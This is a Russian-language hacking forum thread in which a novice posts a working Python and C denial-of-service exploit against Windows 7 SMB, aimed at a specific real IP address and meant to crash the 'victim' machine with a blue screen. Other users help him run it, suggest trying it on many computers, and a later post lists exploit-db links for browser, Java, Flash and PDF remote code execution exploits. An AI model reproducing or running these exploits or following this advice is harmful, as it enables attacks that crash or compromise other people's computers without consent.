PDA

Просмотр полной версии : работа с *.py эксплоитами


red_fox
23.02.2011, 10:57
Добрый день !

Я новичок в плане взлома да и вобще )

Мне конечно очень понравилась программа Metasploit framework, но всех эксплоитов которые там находятся, не совсем хватает, по этому я порылся в гугле и т.д. в итоге нашел эксплоит для ОС windows 7

его содержание такое :

from socket import socket

host = "92.54.70.230", 445

buff = (

"\x00\x00\x00\x90" # Begin SMB header: Session message

"\xff\x53\x4d\x42" # Server Component: SMB

"\x72\x00\x00\x00" # Negociate Protocol

"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853

"\x00\x26"# Process ID High: --> normal value should be "\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x ff\xfe"

"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x 45\x54"

"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x 20\x31"

"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x 30\x00"

"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x 20\x57"

"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x 31\x61"

"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x 02\x4c"

"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x 20\x4c"

"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x 32\x2e"

"\x30\x30\x32\x00"

)

s = socket()

s.connect(host)

s.send(buff)

s.close()


я так понимаю он написан на python ...

пытаюсь запустить с консоли и вот что получаю :

from: can't read /var/mail/socket

host: couldn't get address for '92.54.70.230,': not found

/home/blood/1st.py: строка 4: ошибка синтаксиса около неожиданной лексемы `('

/home/blood/1st.py: строка 4: `buff = ('


ладно ... дальше пробую запустить сначала python и потом из него мой файл :

Python 2.6.6 (r266:84292, Sep 15 2010, 15:52:39)

[GCC 4.4.5] on linux2

Type "help", "copyright", "credits" or "license" for more information.

>>>

'/home/blood/1st.py'

>>>

и ничего

подскажете пожалуйста как мне быть?? что бы я мог использовать сторонние эксплоиты ...

Зарание благодарен...

omg_it_glowZ
23.02.2011, 14:31
Я не спец конечно, но может надо Python 3k?

Просто предположение

usr-bin
24.02.2011, 02:14
red_fox said:
>>>

'/home/blood/1st.py'

>>>
и ничего


Это значит что сплойт выполнился и сплойт на дос атаку чтоб проверить его работу лучше быть за компом жертвы чтоб понять. Есть так-же вариант что smb блокируеться фаером попробуй на виртуалке потестить или на большом количестве компов.

red_fox
24.02.2011, 10:30
По идее на компе жертвы появится BSOD , но пинг показывает что живой , спасибо usr-bin,

я теперь хотя бы знаю чем юзать подобные сплойты ...

red_fox
24.02.2011, 11:47
Но как быть с этим ???

char buff[] =

"\x00\x00\x00\x90"

"\xff\x53\x4d\x42"

"\x72\x00\x00\x00"

"\x00\x18\x53\xc8"

"\x00\x26"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x ff\xfe"

"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x 45\x54"

"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x 20\x31"

"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x 30\x00"

"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x 20\x57"

"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x 31\x61"

"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x 02\x4c"

"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x 20\x4c"

"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x 32\x2e"

"\x30\x30\x32\x00";

int main(int argc, char *argv[]) {

if (argc >>

[COLOR="Red"]>>> '/home/blood/1st.py'

'/home/blood/1st.py'

>>>

Sams
25.02.2011, 21:29
Так это вообще код на С++. Ты что, его через Питон "пропускаешь"?

Их можно запускать через программу lcc.exe. Почитай тему /thread26510.html

afonn
07.04.2016, 18:29
кому надо

[B]

MDAC CVE-2006-0003 https: //www.exploit-...exploits/16561/ (https://www.exploit-db.com/exploits/16561/)Microsoft Internet Explorer - COM CreateObject выполнение кода

PDF CVE-2010-0188 https: // WWW .exploit -... эксплойты / 16670 / (https://www.exploit-db.com/exploits/16670/)Adobe Acrobat Bundled LibTIFF переполнением целочисленного

Java CVE-2011-3544 по протоколу HTTPS: //www.exploit-...exploits/18171/ (https://www.exploit-db.com/exploits/18171/)Java Applet Rhino Script Engine Удаленное выполнение кода

FF CVE-2012- 1710 * Mozilla Firefox использовать против плагинов уязвимости Oracle

Java CVE-2012-0507 https: //www.exploit-...exploits/18679/ (https://www.exploit-db.com/exploits/18679/)Java AtomicReferenceArray Тип Нарушение Уязвимость

IE CVE-2013-0074 по протоколу HTTPS: //www.exploit- ... подвигах / 29858 / (https://www.exploit-db.com/exploits/29858/)Microsoft Internet Explorer - COALineDashStyleArray небезопасный доступ к памяти (MS12-022)

IE CVE-2013-0322 https: //www.exploit-...exploits/32904/ (https://www.exploit-db.com/exploits/32904/)Microsoft Internet Explorer - CMarkup Use-вечернюю Free (MS14-012)

IE CVE-2013-1347 https: //www.exploit-...exploits/25294/ (https://www.exploit-db.com/exploits/25294/)Microsoft Internet Explorer CGenericElement Объект Use-After-Free уязвимости

Java CVE-2013-1493 https: // WWW. эксплуатируют -... эксплойты / 24904 / (https://www.exploit-db.com/exploits/24904/)Java CMM удаленное выполнение кода

Java CVE-2013-2423 https: //www.exploit-...exploits/24976/ (https://www.exploit-db.com/exploits/24976/)Java Applet Отражение Тип Путаница удаленное выполнение кода

JRE CVE-2013-2465 по протоколу HTTPS : //www.exploit-...exploits/27705/ (https://www.exploit-db.com/exploits/27705/)удаленное выполнение кода уязвимости в Oracle JRE

IE CVE-2013-2551 https: //www.exploit-...exploits/26175/ (https://www.exploit-db.com/exploits/26175/)Microsoft Internet Explorer - COALineDashStyleArray Целочисленное переполнение ( MS13-009)

FF CVE-2013-3993 * Mozilla Firefox использовать против плагинов уязвимости IBM

Flash - CVE-2014-0497 https: //www.exploit-...exploits/33212/ (https://www.exploit-db.com/exploits/33212/)Adobe Flash Player Integer Underflow удаленное выполнение кода

IE CVE -2014-6332 https: //www.exploit-...exploits/35229/ (https://www.exploit-db.com/exploits/35229/)Microsoft Internet Explorer